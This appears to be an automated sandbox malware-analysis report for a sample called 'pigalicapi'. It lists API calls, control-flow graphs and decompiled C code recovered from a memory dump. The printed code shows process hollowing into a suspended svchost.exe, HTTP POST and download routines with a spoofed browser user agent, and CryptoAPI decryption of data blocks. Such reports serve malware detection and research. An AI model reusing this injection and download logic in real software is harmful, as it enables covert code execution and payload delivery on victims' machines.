                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117243d
                                                                                                                                                                                                                                                                            0x011723a9
                                                                                                                                                                                                                                                                            0x011723b6
                                                                                                                                                                                                                                                                            0x011723c3
                                                                                                                                                                                                                                                                            0x011723d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011723da
                                                                                                                                                                                                                                                                            0x0117222d
                                                                                                                                                                                                                                                                            0x0117223a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172245
                                                                                                                                                                                                                                                                            0x01172252
                                                                                                                                                                                                                                                                            0x0117225f
                                                                                                                                                                                                                                                                            0x01172270
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172276
                                                                                                                                                                                                                                                                            0x011721d5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172196
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172196

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 011720D4
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 011720E6
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0117C38C), ref: 011720FE
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0117210F
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 01172187
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 011721C0
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011721D5
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(?,01172080,?,00003000,00000040), ref: 011721FE
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 01172227
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 01172245
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01172252
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0117225F
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01172270
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                            • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                            • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                            • Opcode ID: e1e85e2cdbeaf344db74c10da09c05578ce2a4ca9cac2e2fecd0048f437e88b9
                                                                                                                                                                                                                                                                            • Instruction ID: 42849c8e2d5ea00322a57f17fca0fc6636019b14473d7c09bd75de62c8389b91
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1e85e2cdbeaf344db74c10da09c05578ce2a4ca9cac2e2fecd0048f437e88b9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99D161B5A4021AABCB2DCF54CC94FAE7779BB48304F048598F609A7385D7309AC0CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 450 1171840-1171854 451 1171c95-1171c9b 450->451 452 117185a-117185e 450->452 452->451 453 1171864-1171868 452->453 453->451 454 117186e-1171872 453->454 454->451 455 1171878-117190a call 1177d20 InternetCrackUrlA 454->455 455->451 458 1171910-1171930 InternetOpenA 455->458 458->451 459 1171936-1171969 InternetConnectA 458->459 460 117196f-11719a7 HttpOpenRequestA 459->460 461 1171c88-1171c8f InternetCloseHandle 459->461 462 11719ad-11719e5 wnsprintfA HttpAddRequestHeadersA 460->462 463 1171c7b-1171c82 InternetCloseHandle 460->463 461->451 464 1171c6e-1171c75 InternetCloseHandle 462->464 465 11719eb-11719f9 462->465 463->461 464->463 466 1171a04-1171a26 InternetSetOptionA 465->466 467 11719fb-11719fe 465->467 468 1171a30-1171a75 call 1177d20 HttpSendRequestA 466->468 467->466 471 1171c4c-1171c5f 468->471 472 1171a7b-1171aa1 HttpQueryInfoA 468->472 471->464 475 1171c61-1171c68 471->475 473 1171aa3-1171abc call 1177dd0 472->473 474 1171ac9-1171b0f call 1177d20 HttpQueryInfoA 472->474 473->474 480 1171abe-1171ac7 473->480 481 1171b47-1171b6a VirtualAlloc 474->481 482 1171b11-1171b2d call 1177dd0 474->482 475->464 475->468 480->474 484 1171b70-1171b93 481->484 485 1171c19 481->485 482->481 491 1171b2f-1171b39 482->491 488 1171b99-1171bc9 InternetReadFile 484->488 486 1171c23-1171c4a InternetReadFile 485->486 486->471 486->486 489 1171bdb-1171be2 488->489 490 1171bcb-1171bd9 488->490 492 1171be6-1171c11 489->492 493 1171be4 489->493 490->489 491->481 494 1171b3b-1171b41 491->494 496 1171c15 492->496 497 1171c13 492->497 495 1171c17 493->495 494->481 495->471 496->488 497->495
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01171840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                                                            				char _v1300;
                                                                                                                                                                                                                                                                            				char _v1564;
                                                                                                                                                                                                                                                                            				void* _v1568;
                                                                                                                                                                                                                                                                            				void* _v1572;
                                                                                                                                                                                                                                                                            				char* _v1576;
                                                                                                                                                                                                                                                                            				intOrPtr _v1588;
                                                                                                                                                                                                                                                                            				char* _v1592;
                                                                                                                                                                                                                                                                            				signed short _v1612;
                                                                                                                                                                                                                                                                            				intOrPtr _v1616;
                                                                                                                                                                                                                                                                            				char* _v1620;
                                                                                                                                                                                                                                                                            				void* _v1636;
                                                                                                                                                                                                                                                                            				void* _v1640;
                                                                                                                                                                                                                                                                            				void* _v1644;
                                                                                                                                                                                                                                                                            				void* _v1648;
                                                                                                                                                                                                                                                                            				long _v1652;
                                                                                                                                                                                                                                                                            				void _v1656;
                                                                                                                                                                                                                                                                            				void _v1916;
                                                                                                                                                                                                                                                                            				long _v1920;
                                                                                                                                                                                                                                                                            				long _v1924;
                                                                                                                                                                                                                                                                            				long _v1928;
                                                                                                                                                                                                                                                                            				void* _v1932;
                                                                                                                                                                                                                                                                            				intOrPtr _v1936;
                                                                                                                                                                                                                                                                            				long _v1940;
                                                                                                                                                                                                                                                                            				long _v1944;
                                                                                                                                                                                                                                                                            				long _v1948;
                                                                                                                                                                                                                                                                            				void _v2972;
                                                                                                                                                                                                                                                                            				long _v2976;
                                                                                                                                                                                                                                                                            				int _t116;
                                                                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                                                                            				int _t133;
                                                                                                                                                                                                                                                                            				void* _t143;
                                                                                                                                                                                                                                                                            				long _t151;
                                                                                                                                                                                                                                                                            				void* _t194;
                                                                                                                                                                                                                                                                            				void* _t195;
                                                                                                                                                                                                                                                                            				void* _t196;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L37:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v1644 = 0;
                                                                                                                                                                                                                                                                            					_v1640 = 0;
                                                                                                                                                                                                                                                                            					_v1568 = 0;
                                                                                                                                                                                                                                                                            					_v1576 = "*/*";
                                                                                                                                                                                                                                                                            					_v1572 = 0;
                                                                                                                                                                                                                                                                            					E01177D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                            					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                            					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                            					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                            					_v1616 = 0x104;
                                                                                                                                                                                                                                                                            					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                            					_v1588 = 0x104;
                                                                                                                                                                                                                                                                            					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                            					_v1644 = _t117;
                                                                                                                                                                                                                                                                            					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                            					_v1640 = _t119;
                                                                                                                                                                                                                                                                            					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                            						L36:
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                            					_v1568 = _t123;
                                                                                                                                                                                                                                                                            					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                            					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                            					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                            						L34:
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                            					if(_a28 > 0) {
                                                                                                                                                                                                                                                                            						_v1656 = _a28;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                            					_v1652 = 1;
                                                                                                                                                                                                                                                                            					_v1648 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_v1920 = 0x100;
                                                                                                                                                                                                                                                                            						E01177D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                            						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                            						_v1924 = 0;
                                                                                                                                                                                                                                                                            						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                            						if(_t133 == 0) {
                                                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                            							_t137 = E01177DD0( &_v1916);
                                                                                                                                                                                                                                                                            							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                            							_v1936 = _t137;
                                                                                                                                                                                                                                                                            							if(_a32 != 0) {
                                                                                                                                                                                                                                                                            								_t137 = _a32;
                                                                                                                                                                                                                                                                            								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E01177D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                            						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                            						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                            						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                            							_t151 = E01177DD0( &_v1916);
                                                                                                                                                                                                                                                                            							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                            							_v1940 = _t151;
                                                                                                                                                                                                                                                                            							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                            								_v1928 = _v1940;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v1932 = _t143;
                                                                                                                                                                                                                                                                            						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                            							_v2976 = 0;
                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                            								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                            							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                            							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                            							_v8 = 1;
                                                                                                                                                                                                                                                                            							_v1944 = _v1928;
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_v1948 = 0;
                                                                                                                                                                                                                                                                            								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                            								if(_a24 != 0) {
                                                                                                                                                                                                                                                                            									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                            								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                            								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								L29:
                                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L29;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                                                            						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                            					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                            					goto L34;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}










































                                                                                                                                                                                                                                                                            0x01171849
                                                                                                                                                                                                                                                                            0x01171854
                                                                                                                                                                                                                                                                            0x01171c95
                                                                                                                                                                                                                                                                            0x01171c9b
                                                                                                                                                                                                                                                                            0x01171878
                                                                                                                                                                                                                                                                            0x01171878
                                                                                                                                                                                                                                                                            0x01171882
                                                                                                                                                                                                                                                                            0x0117188c
                                                                                                                                                                                                                                                                            0x01171896
                                                                                                                                                                                                                                                                            0x011718a0
                                                                                                                                                                                                                                                                            0x011718b5
                                                                                                                                                                                                                                                                            0x011718ba
                                                                                                                                                                                                                                                                            0x011718bd
                                                                                                                                                                                                                                                                            0x011718cd
                                                                                                                                                                                                                                                                            0x011718d3
                                                                                                                                                                                                                                                                            0x011718e3
                                                                                                                                                                                                                                                                            0x011718e9
                                                                                                                                                                                                                                                                            0x01171902
                                                                                                                                                                                                                                                                            0x0117190a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117191d
                                                                                                                                                                                                                                                                            0x01171923
                                                                                                                                                                                                                                                                            0x01171930
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171956
                                                                                                                                                                                                                                                                            0x0117195c
                                                                                                                                                                                                                                                                            0x01171969
                                                                                                                                                                                                                                                                            0x01171c88
                                                                                                                                                                                                                                                                            0x01171c8f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171c8f
                                                                                                                                                                                                                                                                            0x01171994
                                                                                                                                                                                                                                                                            0x0117199a
                                                                                                                                                                                                                                                                            0x011719a7
                                                                                                                                                                                                                                                                            0x01171c7b
                                                                                                                                                                                                                                                                            0x01171c82
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171c82
                                                                                                                                                                                                                                                                            0x011719c2
                                                                                                                                                                                                                                                                            0x011719c8
                                                                                                                                                                                                                                                                            0x011719e5
                                                                                                                                                                                                                                                                            0x01171c6e
                                                                                                                                                                                                                                                                            0x01171c75
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171c75
                                                                                                                                                                                                                                                                            0x011719eb
                                                                                                                                                                                                                                                                            0x011719f9
                                                                                                                                                                                                                                                                            0x011719fe
                                                                                                                                                                                                                                                                            0x011719fe
                                                                                                                                                                                                                                                                            0x01171a16
                                                                                                                                                                                                                                                                            0x01171a1c
                                                                                                                                                                                                                                                                            0x01171a26
                                                                                                                                                                                                                                                                            0x01171a30
                                                                                                                                                                                                                                                                            0x01171a30
                                                                                                                                                                                                                                                                            0x01171a48
                                                                                                                                                                                                                                                                            0x01171a4d
                                                                                                                                                                                                                                                                            0x01171a50
                                                                                                                                                                                                                                                                            0x01171a6d
                                                                                                                                                                                                                                                                            0x01171a75
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171aa1
                                                                                                                                                                                                                                                                            0x01171aaa
                                                                                                                                                                                                                                                                            0x01171aaf
                                                                                                                                                                                                                                                                            0x01171ab2
                                                                                                                                                                                                                                                                            0x01171abc
                                                                                                                                                                                                                                                                            0x01171abe
                                                                                                                                                                                                                                                                            0x01171ac7
                                                                                                                                                                                                                                                                            0x01171ac7
                                                                                                                                                                                                                                                                            0x01171abc
                                                                                                                                                                                                                                                                            0x01171ad7
                                                                                                                                                                                                                                                                            0x01171adc
                                                                                                                                                                                                                                                                            0x01171adf
                                                                                                                                                                                                                                                                            0x01171b0f
                                                                                                                                                                                                                                                                            0x01171b18
                                                                                                                                                                                                                                                                            0x01171b1d
                                                                                                                                                                                                                                                                            0x01171b20
                                                                                                                                                                                                                                                                            0x01171b2d
                                                                                                                                                                                                                                                                            0x01171b41
                                                                                                                                                                                                                                                                            0x01171b41
                                                                                                                                                                                                                                                                            0x01171b2d
                                                                                                                                                                                                                                                                            0x01171b57
                                                                                                                                                                                                                                                                            0x01171b5d
                                                                                                                                                                                                                                                                            0x01171b6a
                                                                                                                                                                                                                                                                            0x01171c19
                                                                                                                                                                                                                                                                            0x01171c23
                                                                                                                                                                                                                                                                            0x01171c3d
                                                                                                                                                                                                                                                                            0x01171c43
                                                                                                                                                                                                                                                                            0x01171b70
                                                                                                                                                                                                                                                                            0x01171b79
                                                                                                                                                                                                                                                                            0x01171b84
                                                                                                                                                                                                                                                                            0x01171b86
                                                                                                                                                                                                                                                                            0x01171b93
                                                                                                                                                                                                                                                                            0x01171b99
                                                                                                                                                                                                                                                                            0x01171b99
                                                                                                                                                                                                                                                                            0x01171bbf
                                                                                                                                                                                                                                                                            0x01171bc9
                                                                                                                                                                                                                                                                            0x01171bd9
                                                                                                                                                                                                                                                                            0x01171bd9
                                                                                                                                                                                                                                                                            0x01171be2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171bf2
                                                                                                                                                                                                                                                                            0x01171c04
                                                                                                                                                                                                                                                                            0x01171c11
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171c15
                                                                                                                                                                                                                                                                            0x01171c17
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171c17
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171be4
                                                                                                                                                                                                                                                                            0x01171c4c
                                                                                                                                                                                                                                                                            0x01171c55
                                                                                                                                                                                                                                                                            0x01171c5b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171a30

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 01171902
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0117191D
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01171956
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,00200300,00000000), ref: 01171994
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 011719C2
                                                                                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 011719DD
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 01171A16
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01171A6D
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 01171A99
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 01171B07
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 01171B57
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 01171BBF
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 01171C3D
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01171C75
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01171C82
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01171C8F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                            • String ID: */*$0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                            • API String ID: 880997049-2033563659
                                                                                                                                                                                                                                                                            • Opcode ID: d3c973196f9b79855086d611bb321eded11eb84dd5a34ee0981fcb77f934b651
                                                                                                                                                                                                                                                                            • Instruction ID: 4cc48b53d2bbc8862783ee09ee0bb7ec2aa842914b1daffc95d428be9a282a04
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3c973196f9b79855086d611bb321eded11eb84dd5a34ee0981fcb77f934b651
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CC11DB1D44218EFEB28CF54DC49BE9B7B5EB48704F0041D9E60DA6280DB766AD4CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 536 11747f0-1174801 537 1174807-117480e 536->537 538 1174aab-1174ab1 536->538 537->538 539 1174814-1174832 CryptAcquireContextA 537->539 540 1174856-117485a 539->540 541 1174834-117483f GetLastError 539->541 540->538 542 1174860-117489d 540->542 541->540 543 1174841-1174850 CryptAcquireContextA 541->543 545 11748a3-11748f3 call 1177b70 CryptCreateHash 542->545 546 1174a9f-1174aa5 CryptReleaseContext 542->546 543->540 549 1174a90-1174a96 545->549 550 11748f9-1174913 CryptHashData 545->550 546->538 551 1174a9a 549->551 552 1174a98 549->552 553 1174a83-1174a8a CryptDestroyHash 550->553 554 1174919-1174944 CryptDeriveKey 550->554 551->546 552->546 553->549 554->553 555 117494a-117498f CryptDecrypt CryptDestroyKey 554->555 555->553 556 1174995-11749b1 CryptCreateHash 555->556 556->553 557 11749b7-11749d4 CryptHashData 556->557 558 1174a76-1174a7d CryptDestroyHash 557->558 559 11749da-1174a0f CryptGetHashParam 557->559 558->553 559->558 560 1174a11-1174a3c CryptGetHashParam 559->560 560->558 561 1174a3e-1174a58 call 1177c70 560->561 561->558 564 1174a5a-1174a72 call 1177b70 561->564 564->558
                                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                                            			E011747F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				signed int _v5;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				char _v764;
                                                                                                                                                                                                                                                                            				char _v780;
                                                                                                                                                                                                                                                                            				intOrPtr _v784;
                                                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                                                            				int _v792;
                                                                                                                                                                                                                                                                            				int _v796;
                                                                                                                                                                                                                                                                            				intOrPtr _v800;
                                                                                                                                                                                                                                                                            				long* _v804;
                                                                                                                                                                                                                                                                            				int _v808;
                                                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                                                            				char _v816;
                                                                                                                                                                                                                                                                            				int _v820;
                                                                                                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                                                                                                            				char _v828;
                                                                                                                                                                                                                                                                            				char _v844;
                                                                                                                                                                                                                                                                            				int _t61;
                                                                                                                                                                                                                                                                            				char* _t67;
                                                                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                                                            				char* _t73;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                                                            				signed char _t78;
                                                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                            					L25:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                            						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v788 = 0x10;
                                                                                                                                                                                                                                                                            						_v784 = 0x10;
                                                                                                                                                                                                                                                                            						_v792 = 0;
                                                                                                                                                                                                                                                                            						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                            							E01177B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                            							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                            							_t67 =  &_v780;
                                                                                                                                                                                                                                                                            							_v800 = _t67;
                                                                                                                                                                                                                                                                            							_v796 = 0;
                                                                                                                                                                                                                                                                            							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796); // executed
                                                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                                                            								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                            									continue;
